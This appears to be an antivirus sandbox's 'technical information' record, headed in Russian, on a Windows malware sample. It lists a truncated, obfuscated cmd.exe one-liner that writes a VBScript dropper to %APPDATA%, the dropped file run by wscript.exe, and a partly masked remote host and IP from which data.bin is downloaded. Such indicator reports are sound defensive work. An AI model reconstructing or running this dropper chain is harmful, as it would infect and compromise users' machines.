Техническая информация
- '<SYSTEM32>\cmd.exe' /V /C set "DcLwXZA=%APPDATA%\%RANDOM%.vbs" && (for %i in ("DiM TRp" "FuNcTiON Y2sk(MHsKy,XYaSE)" "MhW5KwT=87" "Y2sk=(MHsKy ANd NOt XYaSE)oR(nOT MHsKy aNd XYaSE)" "XzECa=30" "eNd FUnCTiON" "suB ...
- %APPDATA%\21206.vbs
- 'pa###louf.com':80
- '20#.#7.8.251':80
- http://pa###louf.com/data.bin
- DNS ASK pa###louf.com
- '<SYSTEM32>\wscript.exe' "%APPDATA%\21206.vbs"
- '<SYSTEM32>\cmd.exe' /V /C set "DcLwXZA=%APPDATA%\%RANDOM%.vbs" && (for %i in ("DiM TRp" "FuNcTiON Y2sk(MHsKy,XYaSE)" "MhW5KwT=87" "Y2sk=(MHsKy ANd NOt XYaSE)oR(nOT MHsKy aNd XYaSE)" "XzECa=30" "eNd FUnCTiON" "suB ...' (со скрытым окном)